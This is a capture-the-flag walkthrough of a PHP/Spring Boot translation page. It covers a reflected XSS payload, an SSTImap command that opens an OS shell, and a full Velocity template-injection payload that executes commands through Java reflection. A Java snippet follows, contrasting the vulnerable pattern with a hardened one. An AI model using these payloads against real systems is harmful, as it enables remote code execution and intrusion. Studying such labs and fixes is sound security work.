Labyrinth Linguist

Personal Rating: Medium

The challenge presents a translation page for an alien language.

Wappalyzer detected PHP.

The text is sent via a POST request, and the displayed result is the same text rendered in a different font, which is defined in style.css.

The following payload is reflected and executes, so the page is vulnerable to XSS:

<script>alert("test")</script>

I tried injecting special characters, but only % returns the example text and < returns nothing. It does not look like it is vulnerable to a simple SQL or OS command injection.

In the server files we can see that the server uses Spring Boot and Velocity. The following SSTImap command worked to get an OS shell via Velocity SSTI:

python3 sstimap.py -c 5 -d 'text=*' -u http://94.237.62.252:55121/ --os-shell

I inspected the payload that the tool sent, using Wireshark, to find out what it looked like.

After some searching, I found this resource: https://iwconnect.com/apache-velocity-server-side-template-injection/

The payload mentioned here, edited for Linux, worked to list the root folder:

#set($s="")
#set($stringClass=$s.getClass())
#set($stringBuilderClass=$stringClass.forName("java.lang.StringBuilder"))
#set($inputStreamClass=$stringClass.forName("java.io.InputStream"))
#set($readerClass=$stringClass.forName("java.io.Reader"))
#set($inputStreamReaderClass=$stringClass.forName("java.io.InputStreamReader"))
#set($bufferedReaderClass=$stringClass.forName("java.io.BufferedReader"))
#set($collectorsClass=$stringClass.forName("java.util.stream.Collectors"))
#set($systemClass=$stringClass.forName("java.lang.System"))
#set($stringBuilderConstructor=$stringBuilderClass.getConstructor())
#set($inputStreamReaderConstructor=$inputStreamReaderClass.getConstructor($inputStreamClass))
#set($bufferedReaderConstructor=$bufferedReaderClass.getConstructor($readerClass))
#set($runtime=$stringClass.forName("java.lang.Runtime").getRuntime())
#set($process=$runtime.exec("ls /"))
#set($null=$process.waitFor() )
#set($inputStream=$process.getInputStream())
#set($inputStreamReader=$inputStreamReaderConstructor.newInstance($inputStream))
#set($bufferedReader=$bufferedReaderConstructor.newInstance($inputStreamReader))
#set($stringBuilder=$stringBuilderConstructor.newInstance())
#set($output=$bufferedReader.lines().collect($collectorsClass.joining($systemClass.lineSeparator())))
$output

I used CyberChef to fully URL-encode it and then sent it to http://?text=<payload>
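As an added defensive example (not the challenge's own code), the hypothetical handler pattern below shows what makes Velocity evaluate user input, beside the corrected form that passes the text as a context value; class, method and parameter names are assumed, and the probe string is constructed.

```java
import java.io.StringWriter;
import org.apache.velocity.VelocityContext;
import org.apache.velocity.app.Velocity;

public class TranslateDemo {

    // Vulnerable pattern (hypothetical): the request parameter is concatenated
    // into the template source, so Velocity parses any #set/$var directives
    // the user sent, which is exactly what the SSTI payload above relies on.
    static String renderUnsafe(String userText) {
        StringWriter out = new StringWriter();
        String template = "<p class=\"alien\">" + userText + "</p>";
        Velocity.evaluate(new VelocityContext(), out, "translate", template);
        return out.toString();
    }

    // Hardened pattern: the template is a fixed string and the user text is a
    // context value. Velocity prints the value but never re-parses its contents.
    // The text is also HTML-escaped, which closes the reflected XSS noted above.
    static String renderSafe(String userText) {
        StringWriter out = new StringWriter();
        VelocityContext ctx = new VelocityContext();
        ctx.put("text", htmlEscape(userText));
        Velocity.evaluate(ctx, out, "translate", "<p class=\"alien\">$text</p>");
        return out.toString();
    }

    static String htmlEscape(String s) {
        return s.replace("&", "&amp;").replace("<", "&lt;").replace(">", "&gt;")
                .replace("\"", "&quot;").replace("'", "&#39;");
    }

    public static void main(String[] args) {
        // Defence in depth: SecureUberspector blocks reflective calls such as
        // getClass()/Class.forName() from templates. It does not replace the
        // fix above, since templates built from user input remain unsafe.
        Velocity.setProperty("runtime.introspector.uberspect",
                "org.apache.velocity.util.introspection.SecureUberspector");
        Velocity.init();

        // Constructed probe: harmless arithmetic that reveals whether input is evaluated.
        String probe = "#set($x=6*7)$x";
        System.out.println("unsafe: " + renderUnsafe(probe));
        System.out.println("safe:   " + renderSafe(probe));
    }
}
```

If the unsafe output contains the evaluated result rather than the literal probe text, user input is reaching the template parser; the safe variant echoes the probe unchanged.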
